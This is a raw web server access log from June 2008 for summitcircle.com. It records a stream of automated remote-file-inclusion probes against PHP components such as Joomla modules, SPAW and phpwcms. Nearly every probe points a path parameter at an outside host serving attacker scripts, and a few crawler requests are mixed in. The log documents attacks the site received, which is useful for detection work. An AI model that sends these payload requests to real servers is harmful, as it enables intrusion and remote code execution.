212.71.154.105 - - [29/Jun/2008:05:00:03 -0700] "GET /logs/access_071119.log//modules/TotalCalendar/about.php?inc_dir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
212.71.154.105 - - [29/Jun/2008:05:00:04 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
217.31.82.170 - - [29/Jun/2008:05:00:16 -0700] "GET /logs/access_071112.log/errors.php?error=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
217.31.82.170 - - [29/Jun/2008:05:00:17 -0700] "GET /errors.php?error=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
217.31.82.170 - - [29/Jun/2008:05:00:17 -0700] "GET /logs/errors.php?error=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
217.31.82.170 - - [29/Jun/2008:05:00:48 -0700] "GET /logs/access.log/errors.php?error=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
72.30.215.119 - - [29/Jun/2008:05:01:14 -0700] "GET /SlurpConfirm404/governance/oth_magn.htm HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "summitcircle.com"
212.71.154.105 - - [29/Jun/2008:05:01:27 -0700] "GET /logs/access_071210.log//modules/TotalCalendar/about.php?inc_dir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.74.196.90 - - [29/Jun/2008:05:01:30 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://www.wisdomteachers.com/audioblog/flashaudio/07feb/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
77.74.196.90 - - [29/Jun/2008:05:01:42 -0700] "GET /index.php?body=http://www.wisdomteachers.com/audioblog/flashaudio/07feb/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
84.19.184.151 - - [29/Jun/2008:05:01:48 -0700] "GET /logs/access.log/errors.php?error=http://www.centrogassystem.com/frn/osy.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
84.19.184.151 - - [29/Jun/2008:05:01:48 -0700] "GET /errors.php?error=http://www.centrogassystem.com/frn/osy.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
84.19.184.151 - - [29/Jun/2008:05:01:48 -0700] "GET /logs/errors.php?error=http://www.centrogassystem.com/frn/osy.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
217.195.37.166 - - [29/Jun/2008:05:02:23 -0700] "GET /logs/access_071001.log//faqsupport/samplefaqsupport.php?path[docroot]=http://queb3.info/cruise/t.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.6.235.230 - - [29/Jun/2008:05:02:30 -0700] "GET /logs/access_080526.log/errors.php?error=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
64.27.0.117 - - [29/Jun/2008:05:02:53 -0700] "GET /logs/access_070903.log HTTP/1.1" 200 1179648 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.summitcircle.com"
74.6.17.181 - - [29/Jun/2008:05:03:00 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.summitcircle.com"
74.6.17.181 - - [29/Jun/2008:05:03:01 -0700] "GET /logs/access_071112.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.summitcircle.com"
64.27.0.117 - - [29/Jun/2008:05:03:20 -0700] "GET /logs/access_071112.log HTTP/1.1" 200 616420 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.summitcircle.com"
66.135.39.227 - - [29/Jun/2008:05:03:44 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://netlabs.helloweb.eu/r7.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
66.135.39.227 - - [29/Jun/2008:05:03:44 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://netlabs.helloweb.eu/r7.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
66.135.39.227 - - [29/Jun/2008:05:03:45 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://netlabs.helloweb.eu/r7.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
66.135.39.227 - - [29/Jun/2008:05:03:45 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://netlabs.helloweb.eu/r7.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
77.74.196.90 - - [29/Jun/2008:05:04:18 -0700] "GET /index.php?body=http://www.wisdomteachers.com/audioblog/flashaudio/07feb/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
189.14.49.138 - - [29/Jun/2008:05:05:25 -0700] "GET /logs/access.log/errors.php?error=http://electrometro.com.ve/wall/xpl/oi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
189.14.49.138 - - [29/Jun/2008:05:05:25 -0700] "GET /errors.php?error=http://electrometro.com.ve/wall/xpl/oi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
189.14.49.138 - - [29/Jun/2008:05:05:26 -0700] "GET /logs/errors.php?error=http://electrometro.com.ve/wall/xpl/oi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
217.31.82.170 - - [29/Jun/2008:05:06:13 -0700] "GET /logs/access_080526.log/errors.php?error=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.76.111.11 - - [29/Jun/2008:05:06:58 -0700] "GET /logs/access_080310.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.geocities.com/coprald/bangke/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
200.76.111.11 - - [29/Jun/2008:05:06:58 -0700] "GET /logs/access_080310.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.geocities.com/coprald/bangke/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
200.76.111.11 - - [29/Jun/2008:05:06:58 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.geocities.com/coprald/bangke/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
200.76.111.11 - - [29/Jun/2008:05:06:58 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.geocities.com/coprald/bangke/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
200.76.111.11 - - [29/Jun/2008:05:06:58 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.geocities.com/coprald/bangke/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
200.76.111.11 - - [29/Jun/2008:05:06:58 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.geocities.com/coprald/bangke/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
200.76.111.11 - - [29/Jun/2008:05:08:14 -0700] "GET /logs/access_080526.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.geocities.com/coprald/bangke/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
200.76.111.11 - - [29/Jun/2008:05:08:14 -0700] "GET /logs/access_080526.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.geocities.com/coprald/bangke/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
212.71.154.105 - - [29/Jun/2008:05:09:13 -0700] "GET /logs/access_070820.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
212.71.154.105 - - [29/Jun/2008:05:09:13 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
212.71.154.105 - - [29/Jun/2008:05:09:14 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.74.196.90 - - [29/Jun/2008:05:09:21 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://www.wisdomteachers.com/audioblog/flashaudio/07feb/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.250.234.226 - - [29/Jun/2008:05:10:55 -0700] "GET /logs/access_080310.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.250.234.226 - - [29/Jun/2008:05:10:55 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.250.234.226 - - [29/Jun/2008:05:10:56 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.250.234.226 - - [29/Jun/2008:05:11:50 -0700] "GET /logs/access_080526.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
81.209.108.69 - - [29/Jun/2008:05:11:59 -0700] "GET /logs/access_071210.log/index.php?doc=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
81.209.108.69 - - [29/Jun/2008:05:12:02 -0700] "GET /index.php?doc=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
81.209.108.69 - - [29/Jun/2008:05:12:05 -0700] "GET /logs/index.php?doc=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
212.71.154.105 - - [29/Jun/2008:05:13:00 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
212.71.154.105 - - [29/Jun/2008:05:13:00 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
74.63.2.169 - - [29/Jun/2008:05:13:02 -0700] "GET /logs/access_071224.log//browse.php/header.php?prefix=http://yeguadamendeika.com/images/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
74.63.2.169 - - [29/Jun/2008:05:13:02 -0700] "GET //browse.php/header.php?prefix=http://yeguadamendeika.com/images/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
74.63.2.169 - - [29/Jun/2008:05:13:02 -0700] "GET /logs//browse.php/header.php?prefix=http://yeguadamendeika.com/images/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
63.243.44.3 - - [29/Jun/2008:05:14:07 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hoopswriters.com/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
63.243.44.3 - - [29/Jun/2008:05:14:07 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hoopswriters.com/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
212.71.154.105 - - [29/Jun/2008:05:15:03 -0700] "GET /logs/access_080406.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
212.71.154.105 - - [29/Jun/2008:05:15:03 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
212.71.154.105 - - [29/Jun/2008:05:15:04 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
190.54.28.163 - - [29/Jun/2008:05:15:48 -0700] "GET /logs/access_071022.log//modules/vwar/admin/admin.php?vwar_root=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
83.133.125.202 - - [29/Jun/2008:05:17:31 -0700] "GET / HTTP/1.1" 200 779 "http://www.BigFinder.de/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de)" "www.summitcircle.com"
81.209.108.69 - - [29/Jun/2008:05:19:26 -0700] "GET /index.php?content=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
116.12.55.15 - - [29/Jun/2008:05:19:59 -0700] "GET /logs/access_070827.log/admin/editor2/spaw_control.class.php?spaw_root=http://www.ads.dynahoo.com/images/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
85.17.3.183 - - [29/Jun/2008:05:20:00 -0700] "GET /account.php?action=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
217.198.149.20 - - [29/Jun/2008:05:20:33 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://netlabs.helloweb.eu/r7.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
217.198.149.20 - - [29/Jun/2008:05:20:33 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://netlabs.helloweb.eu/r7.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
116.12.55.15 - - [29/Jun/2008:05:20:35 -0700] "GET /logs/access_071021.log/admin/editor2/spaw_control.class.php?spaw_root=http://www.ads.dynahoo.com/images/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
217.198.149.20 - - [29/Jun/2008:05:20:37 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://netlabs.helloweb.eu/r7.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
217.198.149.20 - - [29/Jun/2008:05:20:37 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://netlabs.helloweb.eu/r7.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
69.72.211.242 - - [29/Jun/2008:05:21:05 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
69.72.211.242 - - [29/Jun/2008:05:21:05 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
69.72.211.242 - - [29/Jun/2008:05:21:05 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
216.32.89.242 - - [29/Jun/2008:05:21:18 -0700] "GET /logs/access_070826.log/plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=http://h1.ripway.com/sobatmu/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.32.89.242 - - [29/Jun/2008:05:21:18 -0700] "GET /plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=http://h1.ripway.com/sobatmu/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.32.89.242 - - [29/Jun/2008:05:21:18 -0700] "GET /logs/plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=http://h1.ripway.com/sobatmu/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.32.89.242 - - [29/Jun/2008:05:21:21 -0700] "GET /logs/access_071015.log/plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=http://h1.ripway.com/sobatmu/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
69.72.211.242 - - [29/Jun/2008:05:22:16 -0700] "GET /logs/access_071210.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
69.72.211.242 - - [29/Jun/2008:05:22:16 -0700] "GET /logs/access_071112.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
213.184.200.43 - - [29/Jun/2008:05:22:59 -0700] "GET /logs/access_080526.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.184.200.43 - - [29/Jun/2008:05:22:59 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.184.200.43 - - [29/Jun/2008:05:22:59 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.184.200.43 - - [29/Jun/2008:05:23:06 -0700] "GET /logs/access_080310.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
217.20.138.101 - - [29/Jun/2008:05:24:02 -0700] "GET /logs/access_071001.log/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://gielow.org/advguestbook/EARTHLINK.dat? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
217.20.138.101 - - [29/Jun/2008:05:24:03 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://gielow.org/advguestbook/EARTHLINK.dat? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
217.20.138.101 - - [29/Jun/2008:05:24:03 -0700] "GET /logs/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://gielow.org/advguestbook/EARTHLINK.dat? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.106.202.240 - - [29/Jun/2008:05:24:07 -0700] "GET /logs/access_080310.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.106.202.240 - - [29/Jun/2008:05:24:07 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.106.202.240 - - [29/Jun/2008:05:24:07 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.32.89.242 - - [29/Jun/2008:05:24:24 -0700] "GET /plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=http://h1.ripway.com/sobatmu/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
64.106.202.240 - - [29/Jun/2008:05:24:44 -0700] "GET /logs/access_080526.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.53.114.42 - - [29/Jun/2008:05:24:57 -0700] "GET /logs/access.log/include/bbs.lib.inc.php?site_path=http://www.holidayinfos.com/4images/data/media/666? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
200.53.114.42 - - [29/Jun/2008:05:24:58 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.holidayinfos.com/4images/data/media/666? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
200.53.114.42 - - [29/Jun/2008:05:24:58 -0700] "GET /logs/include/bbs.lib.inc.php?site_path=http://www.holidayinfos.com/4images/data/media/666? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
80.93.56.180 - - [29/Jun/2008:05:26:05 -0700] "GET //mvcw_conver.php?step=1&vwar_root=http://www.blanchardweb.com/tng/admin/.inv/kontol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
72.233.58.23 - - [29/Jun/2008:05:28:36 -0700] "GET /wsnlinks/comments.php?id=122 HTTP/1.1" 404 275 "-" "-" "www.summitcircle.com"
63.243.44.3 - - [29/Jun/2008:05:29:33 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hoopswriters.com/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
216.32.89.242 - - [29/Jun/2008:05:31:01 -0700] "GET /logs/plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=http://h1.ripway.com/sobatmu/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.32.89.242 - - [29/Jun/2008:05:31:02 -0700] "GET /plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=http://h1.ripway.com/sobatmu/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
200.189.184.11 - - [29/Jun/2008:05:31:41 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.189.184.11 - - [29/Jun/2008:05:31:41 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.72.211.242 - - [29/Jun/2008:05:32:51 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
80.93.56.180 - - [29/Jun/2008:05:34:15 -0700] "GET /logs/access_071029.log//mvcw_conver.php?step=1&vwar_root=http://www.blanchardweb.com/tng/admin/.inv/kontol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
80.93.56.180 - - [29/Jun/2008:05:34:16 -0700] "GET /logs//mvcw_conver.php?step=1&vwar_root=http://www.blanchardweb.com/tng/admin/.inv/kontol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.53.114.42 - - [29/Jun/2008:05:34:36 -0700] "GET /logs/access.log/include/bbs.lib.inc.php?site_path=http://www.holidayinfos.com/4images/data/media/666? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
200.53.114.42 - - [29/Jun/2008:05:34:36 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.holidayinfos.com/4images/data/media/666? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
200.53.114.42 - - [29/Jun/2008:05:34:37 -0700] "GET /logs/include/bbs.lib.inc.php?site_path=http://www.holidayinfos.com/4images/data/media/666? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
190.54.28.163 - - [29/Jun/2008:05:36:21 -0700] "GET /logs/access_070916.log//modules/vwar/admin/admin.php?vwar_root=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
66.199.231.50 - - [29/Jun/2008:05:36:31 -0700] "GET /logs/access_080407.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://idlerpg.beirut.com/dream.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
81.209.108.69 - - [29/Jun/2008:05:36:51 -0700] "GET /index.php?doc=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
189.1.168.93 - - [29/Jun/2008:05:37:40 -0700] "GET /logs/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://myonsitetrip.com/components/com_banners/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
189.1.168.93 - - [29/Jun/2008:05:37:40 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://myonsitetrip.com/components/com_banners/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
80.93.56.180 - - [29/Jun/2008:05:37:54 -0700] "GET /logs/access_071001.log//mvcw_conver.php?step=1&vwar_root=http://www.blanchardweb.com/tng/admin/.inv/kontol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
217.20.138.101 - - [29/Jun/2008:05:38:40 -0700] "GET /logs/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://gielow.org/advguestbook/EARTHLINK.dat? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
217.20.138.101 - - [29/Jun/2008:05:38:40 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://gielow.org/advguestbook/EARTHLINK.dat? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
194.87.5.70 - - [29/Jun/2008:05:39:54 -0700] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.endureros.com//db/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
194.87.5.70 - - [29/Jun/2008:05:39:54 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.endureros.com//db/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.62.196.11 - - [29/Jun/2008:05:40:36 -0700] "GET /logs//?error=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 200 9952 "-" "libwww-perl/5.808" "www.summitcircle.com"
85.17.53.225 - - [29/Jun/2008:05:40:50 -0700] "GET /logs/access_071210.log//?include_path=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
85.17.53.225 - - [29/Jun/2008:05:40:50 -0700] "GET //?include_path=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.800" "www.summitcircle.com"
85.17.53.225 - - [29/Jun/2008:05:40:50 -0700] "GET /logs//?include_path=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 200 9952 "-" "libwww-perl/5.800" "www.summitcircle.com"
